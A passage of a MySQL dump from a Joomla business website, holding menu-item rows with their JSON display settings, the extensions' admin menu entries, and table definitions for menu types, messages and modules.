00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"dropdown_position\":\"right\",\"showmenutitle\":\"1\",\"icon\":\"\",\"class\":\"\",\"enable_page_title\":\"1\",\"page_title_alt\":\"\",\"page_subtitle\":\"\",\"page_title_bg_color\":\"\",\"page_title_bg_image\":\"\"}',60,61,0,'*',0),(499,'mainmenu','Link Post Format','link-post-format','','post-formats/link-post-format','index.php?option=com_content&view=article&id=76','component',-2,503,2,22,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"dropdown_position\":\"right\",\"showmenutitle\":\"1\",\"icon\":\"\",\"class\":\"\",\"enable_page_title\":\"1\",\"page_title_alt\":\"\",\"page_subtitle\":\"\",\"page_title_bg_color\":\"\",\"page_title_bg_image\":\"\"}',54,55,0,'*',0),(500,'mainmenu','Status Post Format','status-post-format','','post-formats/status-post-format','index.php?option=com_content&view=article&id=71','component',-2,503,2,22,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"dropdown_position\":\"right\",\"showmenutitle\":\"1\",\"icon\":\"\",\"class\":\"\",\"enable_page_title\":\"1\",\"page_title_alt\":\"\",\"page_subtitle\":\"\",\"page_title_bg_color\":\"\",\"page_title_bg_image\":\"\"}',58,59,0,'*',0),(501,'mainmenu','Quote Post Format','quote-post-format','','post-formats/quote-post-format','index.php?option=com_content&view=article&id=77','component',-2,503,2,22,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"dropdown_position\":\"right\",\"showmenutitle\":\"1\",\"icon\":\"\",\"class\":\"\",\"enable_page_title\":\"1\",\"page_title_alt\":\"\",\"page_subtitle\":\"\",\"page_title_bg_color\":\"\",\"page_title_bg_image\":\"\"}',56,57,0,'*',0),(502,'mainmenu','Portfolio','portfolio-2','','portfolio-2','index.php?option=com_spsimpleportfolio&view=items','component',-2,1,1,10007,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_filter\":\"1\",\"layout_type\":\"gallery_nospace\",\"columns\":\"4\",\"thumbnail_type\":\"square\",\"limit\":\"12\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"menulayout\":\"{\\\"width\\\":600,\\\"menuItem\\\":1,\\\"menuAlign\\\":\\\"right\\\",\\\"layout\\\":[{\\\"type\\\":\\\"row\\\",\\\"attr\\\":[{\\\"type\\\":\\\"column\\\",\\\"colGrid\\\":12,\\\"menuParentId\\\":\\\"502\\\",\\\"moduleId\\\":\\\"\\\"}]}]}\",\"megamenu\":\"0\",\"showmenutitle\":\"1\",\"icon\":\"\",\"class\":\"\",\"enable_page_title\":\"1\",\"page_title_alt\":\"\",\"page_subtitle\":\"\",\"page_title_bg_color\":\"\",\"page_title_bg_image\":\"\"}',35,36,0,'*',0),(503,'mainmenu','Post Formats','post-formats','','post-formats','#','url',-2,1,1,19,0,'0000-00-00 00:00:00',0,1,'',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"menulayout\":\"{\\\"width\\\":600,\\\"menuItem\\\":1,\\\"menuAlign\\\":\\\"right\\\",\\\"layout\\\":[{\\\"type\\\":\\\"row\\\",\\\"attr\\\":[{\\\"type\\\":\\\"column\\\",\\\"colGrid\\\":12,\\\"menuParentId\\\":\\\"503\\\",\\\"moduleId\\\":\\\"\\\"}]}]}\",\"megamenu\":\"0\",\"showmenutitle\":\"1\",\"icon\":\"\",\"class\":\"\",\"enable_page_title\":\"0\",\"page_title_alt\":\"\",\"page_subtitle\":\"\",\"page_title_bg_color\":\"\",\"page_title_bg_image\":\"\"}',45,62,0,'*',0),(504,'mainmenu','Article Category Blog','article-category-blog-2','','blog/article-category-blog-2','index.php?option=com_content&view=category&layout=blog&id=79','component',-2,278,2,22,0,'0000-00-00 00:00:00',0,1,'',0,'{\"layout_type\":\"blog\",\"show_category_heading_title_text\":\"\",\"show_category_title\":\"\",\"show_description\":\"0\",\"show_description_image\":\"0\",\"maxLevel\":\"\",\"show_empty_categories\":\"\",\"show_no_articles\":\"\",\"show_subcat_desc\":\"\",\"show_cat_num_articles\":\"\",\"show_cat_tags\":\"\",\"page_subheading\":\"\",\"num_leading_articles\":\"1\",\"num_intro_articles\":\"4\",\"num_columns\":\"2\",\"num_links\":\"4\",\"multi_column_order\":\"\",\"show_subcategory_content\":\"\",\"orderby_pri\":\"\",\"orderby_sec\":\"\",\"order_date\":\"\",\"show_pagination\":\"2\",\"show_pagination_results\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_readmore\":\"\",\"show_readmore_title\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"show_feed_link\":\"1\",\"feed_summary\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"dropdown_position\":\"right\",\"showmenutitle\":\"1\",\"icon\":\"\",\"class\":\"\",\"enable_page_title\":\"1\",\"page_title_alt\":\"\",\"page_subtitle\":\"\",\"page_title_bg_color\":\"\",\"page_title_bg_image\":\"\"}',42,43,0,'*',0),(517,'main','JMAP','jmap','','jmap','index.php?option=com_jmap','component',0,1,1,10030,0,'0000-00-00 00:00:00',0,1,'class:jmap-16x16',0,'{}',165,166,0,'',1),(527,'main','COM_SPPAGEBUILDER','com-sppagebuilder','','com-sppagebuilder','index.php?option=com_sppagebuilder','component',0,1,1,10047,0,'0000-00-00 00:00:00',0,1,'class:component',0,'{}',167,168,0,'',1),(528,'mainmenu','Products','saleslogic-products','','saleslogic-products','index.php?option=com_content&view=article&id=85','component',1,1,1,22,0,'0000-00-00 00:00:00',0,1,' ',0,'{\"show_title\":\"0\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"0\",\"show_publish_date\":\"0\",\"show_item_navigation\":\"0\",\"show_vote\":\"0\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"0\",\"show_tags\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"Saleslogic product range\",\"show_page_heading\":\"\",\"page_heading\":\" \",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"menulayout\":\"{\\\"width\\\":600,\\\"menuItem\\\":1,\\\"menuAlign\\\":\\\"right\\\",\\\"layout\\\":[{\\\"type\\\":\\\"row\\\",\\\"attr\\\":[{\\\"type\\\":\\\"column\\\",\\\"colGrid\\\":12,\\\"menuParentId\\\":\\\"528\\\",\\\"moduleId\\\":\\\"119\\\"}]}]}\",\"megamenu\":\"0\",\"showmenutitle\":\"1\",\"icon\":\"\",\"class\":\"\",\"enable_page_title\":\"0\",\"page_title_alt\":\"\",\"page_subtitle\":\"\",\"page_title_bg_color\":\"\",\"page_title_bg_image\":\"\"}',15,16,0,'*',0),(529,'mainmenu','Testimonials','2016-02-26-10-14-31','','2016-02-26-10-14-31','#','url',1,1,1,0,0,'0000-00-00 00:00:00',0,1,' ',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"menulayout\":\"{\\\"width\\\":600,\\\"menuItem\\\":1,\\\"menuAlign\\\":\\\"right\\\",\\\"layout\\\":[{\\\"type\\\":\\\"row\\\",\\\"attr\\\":[{\\\"type\\\":\\\"column\\\",\\\"colGrid\\\":12,\\\"menuParentId\\\":\\\"529\\\",\\\"moduleId\\\":\\\"\\\"}]}]}\",\"megamenu\":\"0\",\"showmenutitle\":\"1\",\"icon\":\"\",\"class\":\"\",\"enable_page_title\":\"0\",\"page_title_alt\":\"\",\"page_subtitle\":\"\",\"page_title_bg_color\":\"\",\"page_title_bg_image\":\"\"}',17,18,0,'*',0),(530,'mainmenu','About us','2016-02-26-10-15-11','','2016-02-26-10-15-11','#','url',1,1,1,0,0,'0000-00-00 00:00:00',0,1,' ',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"menulayout\":\"{\\\"width\\\":600,\\\"menuItem\\\":1,\\\"menuAlign\\\":\\\"right\\\",\\\"layout\\\":[{\\\"type\\\":\\\"row\\\",\\\"attr\\\":[{\\\"type\\\":\\\"column\\\",\\\"colGrid\\\":12,\\\"menuParentId\\\":\\\"530\\\",\\\"moduleId\\\":\\\"\\\"}]}]}\",\"megamenu\":\"0\",\"showmenutitle\":\"1\",\"icon\":\"\",\"class\":\"\",\"enable_page_title\":\"0\",\"page_title_alt\":\"\",\"page_subtitle\":\"\",\"page_title_bg_color\":\"\",\"page_title_bg_image\":\"\"}',13,14,0,'*',0),(531,'mainmenu','Support','2016-02-26-10-15-29','','2016-02-26-10-15-29','#','url',1,1,1,0,0,'0000-00-00 00:00:00',0,1,' ',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"menulayout\":\"{\\\"width\\\":600,\\\"menuItem\\\":1,\\\"menuAlign\\\":\\\"right\\\",\\\"layout\\\":[{\\\"type\\\":\\\"row\\\",\\\"attr\\\":[{\\\"type\\\":\\\"column\\\",\\\"colGrid\\\":12,\\\"menuParentId\\\":\\\"529\\\",\\\"moduleId\\\":\\\"\\\"}]}]}\",\"megamenu\":\"0\",\"showmenutitle\":\"1\",\"icon\":\"\",\"class\":\"\",\"enable_page_title\":\"0\",\"page_title_alt\":\"\",\"page_subtitle\":\"\",\"page_title_bg_color\":\"\",\"page_title_bg_image\":\"\"}',19,20,0,'*',0),(532,'mainmenu','Blog','dashlogic-blog','','dashlogic-blog','index.php?option=com_content&view=category&layout=blog&id=79','component',1,1,1,22,0,'0000-00-00 00:00:00',0,1,' ',0,'{\"layout_type\":\"blog\",\"show_category_heading_title_text\":\"\",\"show_category_title\":\"\",\"show_description\":\"\",\"show_description_image\":\"\",\"maxLevel\":\"\",\"show_empty_categories\":\"\",\"show_no_articles\":\"\",\"show_subcat_desc\":\"\",\"show_cat_num_articles\":\"\",\"show_cat_tags\":\"\",\"page_subheading\":\"\",\"num_leading_articles\":\"\",\"num_intro_articles\":\"\",\"num_columns\":\"\",\"num_links\":\"\",\"multi_column_order\":\"\",\"show_subcategory_content\":\"\",\"orderby_pri\":\"\",\"orderby_sec\":\"\",\"order_date\":\"\",\"show_pagination\":\"\",\"show_pagination_results\":\"\",\"show_featured\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_readmore\":\"\",\"show_readmore_title\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"show_feed_link\":\"\",\"feed_summary\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"Get the latest news on what’s happening in the Dashlogic community \",\"show_page_heading\":\"\",\"page_heading\":\" \",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"menulayout\":\"{\\\"width\\\":600,\\\"menuItem\\\":1,\\\"menuAlign\\\":\\\"right\\\",\\\"layout\\\":[{\\\"type\\\":\\\"row\\\",\\\"attr\\\":[{\\\"type\\\":\\\"column\\\",\\\"colGrid\\\":12,\\\"menuParentId\\\":\\\"532\\\",\\\"moduleId\\\":\\\"\\\"}]}]}\",\"megamenu\":\"0\",\"showmenutitle\":\"1\",\"icon\":\"\",\"class\":\"\",\"enable_page_title\":\"0\",\"page_title_alt\":\"\",\"page_subtitle\":\"\",\"page_title_bg_color\":\"\",\"page_title_bg_image\":\"\"}',21,22,0,'*',0),(533,'mainmenu','Partners','2016-02-26-10-15-50','','2016-02-26-10-15-50','#','url',1,1,1,0,0,'0000-00-00 00:00:00',0,1,' ',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"menulayout\":\"{\\\"width\\\":600,\\\"menuItem\\\":1,\\\"menuAlign\\\":\\\"right\\\",\\\"layout\\\":[{\\\"type\\\":\\\"row\\\",\\\"attr\\\":[{\\\"type\\\":\\\"column\\\",\\\"colGrid\\\":12,\\\"menuParentId\\\":\\\"529\\\",\\\"moduleId\\\":\\\"\\\"}]}]}\",\"megamenu\":\"0\",\"showmenutitle\":\"1\",\"icon\":\"\",\"class\":\"\",\"enable_page_title\":\"0\",\"page_title_alt\":\"\",\"page_subtitle\":\"\",\"page_title_bg_color\":\"\",\"page_title_bg_image\":\"\"}',23,24,0,'*',0),(534,'mainmenu','Contact','2016-02-26-10-16-05','','2016-02-26-10-16-05','#','url',1,1,1,0,0,'0000-00-00 00:00:00',0,1,' ',0,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"dropdown_position\":\"right\",\"showmenutitle\":\"1\",\"icon\":\"\",\"class\":\"\",\"enable_page_title\":\"0\",\"page_title_alt\":\"\",\"page_subtitle\":\"\",\"page_title_bg_color\":\"\",\"page_title_bg_image\":\"\"}',169,170,0,'*',0),(535,'main','COM_IMAGERECYCLE','com-imagerecycle','','com-imagerecycle','index.php?option=com_imagerecycle','component',0,1,1,10028,0,'0000-00-00 00:00:00',0,1,'components/com_imagerecycle/assets/images/com_imagerecycle-16.png',0,'{}',171,172,0,'',1),(536,'main','Watchfulli','watchfulli','','watchfulli','index.php?option=com_watchfulli','component',0,1,1,10027,0,'0000-00-00 00:00:00',0,1,'../administrator/components/com_watchfulli/watchfulli_picto_16x16.png',0,'{}',173,174,0,'',1),(537,'main','COM_DJIMAGESLIDER','com-djimageslider','','com-djimageslider','index.php?option=com_djimageslider','component',0,1,1,10039,0,'0000-00-00 00:00:00',0,1,'components/com_djimageslider/assets/icon-16-djimageslider.png',0,'{}',175,180,0,'',1),(538,'main','COM_DJIMAGESLIDER_SLIDES','com-djimageslider-slides','','com-djimageslider/com-djimageslider-slides','index.php?option=com_djimageslider&view=items','component',0,537,2,10039,0,'0000-00-00 00:00:00',0,1,'components/com_djimageslider/assets/icon-16-menu-slides.png',0,'{}',176,177,0,'',1),(539,'main','COM_DJIMAGESLIDER_CATEGORIES','com-djimageslider-categories','','com-djimageslider/com-djimageslider-categories','index.php?option=com_categories&extension=com_djimageslider','component',0,537,2,10039,0,'0000-00-00 00:00:00',0,1,'class:category',0,'{}',178,179,0,'',1),(541,'main','COM_ADMINTOOLS','com-admintools','','com-admintools','index.php?option=com_admintools','component',1,1,1,10016,0,'0000-00-00 00:00:00',0,1,'com_admintools/media/images/admintools-16.png',0,'{}',181,182,0,'',1),(543,'main','COM_AKEEBA','com-akeeba','','com-akeeba','index.php?option=com_akeeba','component',1,1,1,10023,0,'0000-00-00 00:00:00',0,1,'../media/com_akeeba/icons/akeeba-16.png',0,'{}',183,184,0,'',1),(544,'saleslogic','Tradelogic','tradelogic','','tradelogic','index.php?option=com_content&view=article&id=83','component',1,1,1,22,0,'0000-00-00 00:00:00',0,1,' ',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"dropdown_position\":\"right\",\"showmenutitle\":\"1\",\"icon\":\"\",\"class\":\"\",\"enable_page_title\":\"0\",\"page_title_alt\":\"\",\"page_subtitle\":\"\",\"page_title_bg_color\":\"\",\"page_title_bg_image\":\"\"}',185,186,0,'*',0),(545,'saleslogic','Weblogic','weblogic','','weblogic','index.php?option=com_content&view=article&id=84','component',1,1,1,22,0,'0000-00-00 00:00:00',0,1,' ',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_tags\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"dropdown_position\":\"right\",\"showmenutitle\":\"1\",\"icon\":\"\",\"class\":\"\",\"enable_page_title\":\"0\",\"page_title_alt\":\"\",\"page_subtitle\":\"\",\"page_title_bg_color\":\"\",\"page_title_bg_image\":\"\"}',187,188,0,'*',0),(546,'main','BreezingForms','BreezingForms','','breezingforms','index.php?option=com_breezingforms','component',0,1,1,10054,0,'0000-00-00 00:00:00',0,1,'class:component',0,'{}',189,204,0,'',1),(547,'main','COM_BREEZINGFORMS_MANAGE_RECORDS','Manage Records','','breezingforms/com-breezingforms-manage-records','index.php?option=com_breezingforms&act=managerecs','component',0,546,2,10054,0,'0000-00-00 00:00:00',0,1,'components/com_breezingforms/images/js/ThemeOffice/checkin.png',0,'{}',190,191,0,'',1),(548,'main','COM_BREEZINGFORMS_MANAGE_FORMS','Manage Forms','','breezingforms/com-breezingforms-manage-forms','index.php?option=com_breezingforms&act=manageforms','component',0,546,2,10054,0,'0000-00-00 00:00:00',0,1,'components/com_breezingforms/images/js/ThemeOffice/content.png',0,'{}',192,193,0,'',1),(549,'main','COM_BREEZINGFORMS_MANAGE_SCRIPTS','Manage Scripts','','breezingforms/com-breezingforms-manage-scripts','index.php?option=com_breezingforms&act=managescripts','component',0,546,2,10054,0,'0000-00-00 00:00:00',0,1,'components/com_breezingforms/images/js/ThemeOffice/controlpanel.png',0,'{}',194,195,0,'',1),(550,'main','COM_BREEZINGFORMS_MANAGE_PIECES','Manage Pieces','','breezingforms/com-breezingforms-manage-pieces','index.php?option=com_breezingforms&act=managepieces','component',0,546,2,10054,0,'0000-00-00 00:00:00',0,1,'components/com_breezingforms/images/js/ThemeOffice/controlpanel.png',0,'{}',196,197,0,'',1),(551,'main','COM_BREEZINGFORMS_INTEGRATOR','Integrator','','breezingforms/com-breezingforms-integrator','index.php?option=com_breezingforms&act=integrate','component',0,546,2,10054,0,'0000-00-00 00:00:00',0,1,'components/com_breezingforms/images/js/ThemeOffice/controlpanel.png',0,'{}',198,199,0,'',1),(552,'main','COM_BREEZINGFORMS_MANAGE_BACKEND_MENUS','Manage Backend Menus','','breezingforms/com-breezingforms-manage-backend-menus','index.php?option=com_breezingforms&act=managemenus','component',0,546,2,10054,0,'0000-00-00 00:00:00',0,1,'components/com_breezingforms/images/js/ThemeOffice/mainmenu.png',0,'{}',200,201,0,'',1),(553,'main','COM_BREEZINGFORMS_CONFIGURATION','Configuration','','breezingforms/com-breezingforms-configuration','index.php?option=com_breezingforms&act=configuration','component',0,546,2,10054,0,'0000-00-00 00:00:00',0,1,'components/com_breezingforms/images/js/ThemeOffice/config.png',0,'{}',202,203,0,'',1);
/*!40000 ALTER TABLE `atlyh_menu` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_menu_types`
--
DROP TABLE IF EXISTS `atlyh_menu_types`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_menu_types` (
`id` int(10) unsigned NOT NULL AUTO_INCREMENT,
`menutype` varchar(24) NOT NULL,
`title` varchar(48) NOT NULL,
`description` varchar(255) NOT NULL DEFAULT '',
PRIMARY KEY (`id`),
UNIQUE KEY `idx_menutype` (`menutype`)
) ENGINE=InnoDB AUTO_INCREMENT=10 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_menu_types`
--
LOCK TABLES `atlyh_menu_types` WRITE;
/*!40000 ALTER TABLE `atlyh_menu_types` DISABLE KEYS */;
INSERT INTO `atlyh_menu_types` VALUES (2,'usermenu','User Menu','A Menu for logged-in Users'),(4,'mainmenu','Main Menu','Main Menu'),(8,'partners','Our Partmers',''),(9,'saleslogic','Saleslogic Products','');
/*!40000 ALTER TABLE `atlyh_menu_types` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_messages`
--
DROP TABLE IF EXISTS `atlyh_messages`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_messages` (
`message_id` int(10) unsigned NOT NULL AUTO_INCREMENT,
`user_id_from` int(10) unsigned NOT NULL DEFAULT 0,
`user_id_to` int(10) unsigned NOT NULL DEFAULT 0,
`folder_id` tinyint(3) unsigned NOT NULL DEFAULT 0,
`date_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`state` tinyint(1) NOT NULL DEFAULT 0,
`priority` tinyint(1) unsigned NOT NULL DEFAULT 0,
`subject` varchar(255) NOT NULL DEFAULT '',
`message` text NOT NULL,
PRIMARY KEY (`message_id`),
KEY `useridto_state` (`user_id_to`,`state`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_messages`
--
LOCK TABLES `atlyh_messages` WRITE;
/*!40000 ALTER TABLE `atlyh_messages` DISABLE KEYS */;
/*!40000 ALTER TABLE `atlyh_messages` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_messages_cfg`
--
DROP TABLE IF EXISTS `atlyh_messages_cfg`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_messages_cfg` (
`user_id` int(10) unsigned NOT NULL DEFAULT 0,
`cfg_name` varchar(100) NOT NULL DEFAULT '',
`cfg_value` varchar(255) NOT NULL DEFAULT '',
UNIQUE KEY `idx_user_var_name` (`user_id`,`cfg_name`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_messages_cfg`
--
LOCK TABLES `atlyh_messages_cfg` WRITE;
/*!40000 ALTER TABLE `atlyh_messages_cfg` DISABLE KEYS */;
/*!40000 ALTER TABLE `atlyh_messages_cfg` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_modules`
--
DROP TABLE IF EXISTS `atlyh_modules`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_modules` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`asset_id` int(10) unsigned NOT NULL DEFAULT 0 COMMENT 'FK to the #__assets table.',
`title` varchar(100) NOT NULL DEFAULT '',
`note` varchar(255) NOT NULL DEFAULT '',
`content` text NOT NULL,
`ordering` int(11) NOT NULL DEFAULT 0,
`position` varchar(50) NOT NULL DEFAULT '',
`checked_out` int(10) unsigned NOT NULL DEFAULT 0,
`checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`publish_up` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`publish_down` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`published` tinyint(1) NOT NULL DEFAULT 0,
`module` varchar(50) DEFAULT NULL,
`access` int(10) unsigned NOT NULL DEFAULT 0,
`showtitle` tinyint(3) unsigned NOT NULL DEFAULT 1,
`params` text NOT NULL,
`client_id` tinyint(4) NOT NULL DEFAULT 0,
`language` char(7) NOT NULL,
PRIMARY KEY (`id`),
KEY `published` (`published`,`access`),
KEY `newsfeeds` (`module`,`published`),
KEY `idx_language` (`language`)
) ENGINE=InnoDB AUTO_INCREMENT=121 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_modules`
--
LOCK TABLES `atlyh_modules` WRITE;
/*!40000 ALTER TABLE `atlyh_modules` DISABLE KEYS */;
